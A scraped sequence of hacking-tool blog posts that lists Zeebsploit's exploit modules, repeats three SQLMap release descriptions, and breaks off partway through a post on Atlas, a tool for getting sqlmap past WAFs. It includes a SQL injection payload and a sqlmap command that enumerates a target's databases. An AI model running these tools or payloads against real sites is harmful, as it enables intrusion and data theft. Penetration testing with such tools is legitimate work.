<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/bambish/ScanQLi" rel="nofollow" target="_blank" title="Download ScanQLi">Download ScanQLi</a></span></b><br />
<b><br /></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-68991414791589014192019-04-15T01:24:00.001-04:002019-04-15T01:24:48.129-04:00Zeebsploit - Web Scanner / Exploitation / Information Gathering<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-7v--PzzsDpY/XKeNIVzS2xI/AAAAAAAAOf0/-a_d1NCPy1w7lEDH2t8rkMAF2ZW_3YvTACLcBGAs/s1600/Zeebsploit_4_Zeebsploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="1600" height="640" src="https://3.bp.blogspot.com/-7v--PzzsDpY/XKeNIVzS2xI/AAAAAAAAOf0/-a_d1NCPy1w7lEDH2t8rkMAF2ZW_3YvTACLcBGAs/s640/Zeebsploit_4_Zeebsploit.png" width="640" /></a></div>
<br />
Zeebsploit is a web hacking tool for gathering information about a website and scanning it for vulnerabilities.<br />
<br />
<a name='more'></a><br />
<br />
<span style="font-size: x-large;"><b>Installation & Usage</b></span><br />
<pre><code>apt-get install git
git clone https://github.com/jaxBCD/Zeebsploit.git
cd Zeebsploit
chmod +x install
./install
python3 zeebsploit.py
# type 'help' to list the modules, then follow the instructions</code></pre>
<br />
<span style="font-size: large;"><b>Modules</b></span><br />
<pre><code>[Main modules]
+----------+-------------------------------+
| Modules | Description |
+----------+-------------------------------+
| Exploit | Exploitation Modules |
| Scanners | Scanners Modules |
| infoga | information Gathering Modules |
+----------+-------------------------------+
[Exploit Modules]
+---------------------------+--------------------------------------------------+
| Modules | Description |
+---------------------------+--------------------------------------------------+
| wp content injection | wordpress content injection version 4.7 or 4.7.1 |
| wp revslider | wordpress plugin revslider remote file upload |
| wp learndash | wordpress learndash remote file upload |
| wp swhobiz | wordpress plugin showbiz remote file upload |
| joomla com fabrik | joomla component fabrik file upload |
| joomla manager get config | joomla component manager auto get config |
| joomla jdownload | joomla component jdownloads remote file upload |
| joomla | Joomla ads manager component auto shell upload |
| apache struts rce | CVE-2017-5638 - Apache Struts2 S2-045 |
| | remote command execution |
| drupal8 rce | drupal version 8 remote command execution |
| dvr cam leak credential | TBK DVR4104 / DVR4216 |
| | - Credentials Leak (Get User and password) |
| webdav file upload | Nothing |
| ---More--- | Coming Soon the following version |
+---------------------------+--------------------------------------------------+
[Scanner Module]
+--------------------+----------------------------------------+
| Modules | Description |
+--------------------+----------------------------------------+
| subdomain scanner | Scan Subdomain for Web |
| sqli scanner | Scan Sql Injection Vulnerability |
| xss scanner | Scan XSS Injection Vulnerability |
| lfi scanner | Local File Includes Scanner etc/passwd |
| admin login finder | Scan Admin Login page |
| directory scanner | scan directories on web using dirhunt |
| subdomain takeover | scan type subdomain takeover |
| ---More--- | Coming Soon the following version |
+--------------------+----------------------------------------+
[Information Gathering]
+--------------------+------------------------------------------+
| Modules | Description |
+--------------------+------------------------------------------+
| cms detector | a tool for detecting cms on a web |
| port scanner | Scan Open Port use Nmap |
| information header | response header information |
| ip geolocation | detect the location of an ip or host |
| email searcher | searching email from web |
| traceroute | show the route the packet has passed |
| robot.txt detector | Scan robots.txt from Web |
| header information | Response Header Checker |
| whois lookup | looking for registered users or |
| | recipients of Internet resource rights |
| ---More--- | Coming Soon the following version |
+--------------------+------------------------------------------+</code></pre>
<br />
<span style="font-size: large;"><b>Join Team : <a href="https://www.facebook.com/groups/1217219985083200" rel="nofollow" target="_blank" title="[Click This]">[Click This]</a></b></span><br />
<span style="font-size: large;"><b>Contact : <a href="https://www.facebook.com/jaka.lesmana.794628" rel="nofollow" target="_blank" title="[Contact Me]">[Contact]</a></b></span><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/jaxBCD/Zeebsploit" rel="nofollow" target="_blank" title="Download Zeebsploit">Download Zeebsploit</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-2114541133380135692019-01-08T09:07:00.000-03:002019-01-08T09:07:01.984-03:00SQLMap v1.3 - Automatic SQL Injection And Database Takeover Tool<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-GC4nIng0wo0/XDQiHta_EsI/AAAAAAAANsE/416msPc474o479aqD1OoVR5CvAHSA06WACLcBGAs/s1600/sqlmap_1.3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="560" data-original-width="729" height="490" src="https://4.bp.blogspot.com/-GC4nIng0wo0/XDQiHta_EsI/AAAAAAAANsE/416msPc474o479aqD1OoVR5CvAHSA06WACLcBGAs/s640/sqlmap_1.3.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support to <strong>directly connect to the database</strong> without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support to enumerate <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support to <strong>dump database tables</strong> entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support to <strong>search for specific database names, specific tables across all databases or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials where the relevant column names contain strings like <code>name</code> and <code>pass</code>.</li>
<li style="text-align: justify;">Support to <strong>download and upload any file</strong> from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>execute arbitrary commands and retrieve their standard output</strong> on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>establish an out-of-band stateful TCP connection between the attacker machine and the database server</strong> underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.</li>
<li style="text-align: justify;">Support for <strong>database process' user privilege escalation</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<b><span style="font-size: large;">Demo</span></b><br />
<div style="text-align: center;">
<script async="" id="asciicast-46601" src="https://asciinema.org/a/46601.js"></script>
</div>
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<span style="font-size: large;"><b>Translations</b></span><br />
<ul>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md" rel="nofollow" target="_blank">Bulgarian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md" rel="nofollow" target="_blank">Chinese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md" rel="nofollow" target="_blank">Croatian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md" rel="nofollow" target="_blank">French</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md" rel="nofollow" target="_blank">Greek</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md" rel="nofollow" target="_blank">Indonesian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md" rel="nofollow" target="_blank">Italian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md" rel="nofollow" target="_blank">Japanese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md" rel="nofollow" target="_blank">Portuguese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md" rel="nofollow" target="_blank">Spanish</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md" rel="nofollow" target="_blank">Turkish</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.3</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-65598514737474729242018-11-07T17:40:00.000-03:002018-11-07T17:40:01.308-03:00SQLMap v1.2.11 - Automatic SQL Injection And Database Takeover Tool<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-fjbeMsvYLgo/W-CAdJlqSnI/AAAAAAAANGo/BnCH858GUxED98WM14auy_Hs4nVT85xeACLcBGAs/s1600/sqlmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="532" data-original-width="689" height="494" src="https://2.bp.blogspot.com/-fjbeMsvYLgo/W-CAdJlqSnI/AAAAAAAANGo/BnCH858GUxED98WM14auy_Hs4nVT85xeACLcBGAs/s640/sqlmap.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support for <strong>connecting directly to the database</strong> without going through a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support for enumerating <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support for <strong>dumping database tables</strong> entirely, a range of entries, or specific columns, as the user chooses. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support for <strong>searching for specific database names, specific tables across all databases, or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials, where the relevant column names contain strings like name and pass.</li>
<li style="text-align: justify;">Support for <strong>downloading and uploading any file</strong> from or to the file system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support for <strong>executing arbitrary commands and retrieving their standard output</strong> on the operating system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support for <strong>establishing an out-of-band stateful TCP connection between the attacker machine and the operating system underlying the database server</strong>. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session, as the user chooses.</li>
<li style="text-align: justify;">Support for <strong>privilege escalation of the database process's user</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or the latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<b><span style="font-size: large;">Demo</span></b><br />
<div style="text-align: center;">
<script async="" id="asciicast-46601" src="https://asciinema.org/a/46601.js"></script>
</div>
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<span style="font-size: large;"><b>Translations</b></span><br />
<ul>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md" rel="nofollow" target="_blank">Bulgarian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md" rel="nofollow" target="_blank">Chinese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md" rel="nofollow" target="_blank">Croatian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md" rel="nofollow" target="_blank">French</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md" rel="nofollow" target="_blank">Greek</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md" rel="nofollow" target="_blank">Indonesian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md" rel="nofollow" target="_blank">Italian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md" rel="nofollow" target="_blank">Japanese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md" rel="nofollow" target="_blank">Portuguese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md" rel="nofollow" target="_blank">Spanish</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md" rel="nofollow" target="_blank">Turkish</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.2.11</a></span></b></div>
SQLMap v1.2.10 - Automatic SQL Injection And Database Takeover Tool (published 2018-10-16)<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-qtuN6e4E00w/W8UvYRg_-dI/AAAAAAAAM6k/JWBtb_29xZcBGvhnqpMLLSUTJ2L_e8drgCLcBGAs/s1600/sqlmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="612" data-original-width="968" height="404" src="https://4.bp.blogspot.com/-qtuN6e4E00w/W8UvYRg_-dI/AAAAAAAAM6k/JWBtb_29xZcBGvhnqpMLLSUTJ2L_e8drgCLcBGAs/s640/sqlmap.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester, and a broad range of switches covering database fingerprinting, fetching data from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support for <strong>connecting directly to the database</strong> without going through a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support for enumerating <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support for <strong>dumping database tables</strong> entirely, a range of entries, or specific columns, as the user chooses. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support for <strong>searching for specific database names, specific tables across all databases, or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials, where the relevant column names contain strings like name and pass.</li>
<li style="text-align: justify;">Support for <strong>downloading and uploading any file</strong> from or to the file system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support for <strong>executing arbitrary commands and retrieving their standard output</strong> on the operating system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support for <strong>establishing an out-of-band stateful TCP connection between the attacker machine and the operating system underlying the database server</strong>. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session, as the user chooses.</li>
<li style="text-align: justify;">Support for <strong>privilege escalation of the database process's user</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or the latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<b><span style="font-size: large;">Demo</span></b><br />
<div style="text-align: center;">
<script async="" id="asciicast-46601" src="https://asciinema.org/a/46601.js"></script>
</div>
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<span style="font-size: large;"><b>Translations</b></span><br />
<ul>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md" rel="nofollow" target="_blank">Bulgarian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md" rel="nofollow" target="_blank">Chinese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md" rel="nofollow" target="_blank">Croatian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md" rel="nofollow" target="_blank">French</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md" rel="nofollow" target="_blank">Greek</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md" rel="nofollow" target="_blank">Indonesian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md" rel="nofollow" target="_blank">Italian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md" rel="nofollow" target="_blank">Japanese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md" rel="nofollow" target="_blank">Portuguese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md" rel="nofollow" target="_blank">Spanish</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md" rel="nofollow" target="_blank">Turkish</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.2.10</a></span></b></div>
Atlas - Quick SQLMap Tamper Suggester (published 2018-10-07)<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-pleGGZ3mCD0/W7ktKaxedII/AAAAAAAAMuc/t8hAqm3E_GgzI8-WJqT-C1ZZwWZMp01YgCLcBGAs/s1600/Atlas_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="1368" height="224" src="https://3.bp.blogspot.com/-pleGGZ3mCD0/W7ktKaxedII/AAAAAAAAMuc/t8hAqm3E_GgzI8-WJqT-C1ZZwWZMp01YgCLcBGAs/s640/Atlas_1.png" width="640" /></a></div>
<br />
<strong>Atlas</strong> is an open source tool that suggests sqlmap tamper scripts for getting past a WAF/IDS/IPS; its suggestions are based on the HTTP status code returned for each tampered request.<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>Screen</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-eRr-nbpW3lY/W7ktO8fpIaI/AAAAAAAAMug/4z48m9R8Ys8HqQUSElRN2wlbScwUmy7PwCLcBGAs/s1600/Atlas_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="747" data-original-width="1600" height="298" src="https://3.bp.blogspot.com/-eRr-nbpW3lY/W7ktO8fpIaI/AAAAAAAAMug/4z48m9R8Ys8HqQUSElRN2wlbScwUmy7PwCLcBGAs/s640/Atlas_2.png" width="640" /></a></div>
<br />
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
<pre><code>$ git clone https://github.com/m4ll0k/Atlas.git atlas
$ cd atlas
$ python atlas.py</code></pre>
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
<pre><code>$ python atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --dbms=mysql --random-agent -v</code></pre>
<br />
<span style="font-size: large;"><b>Example</b></span><br />
<ol>
<li>Run SQLMap:</li>
</ol>
<pre><code>$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3</code></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
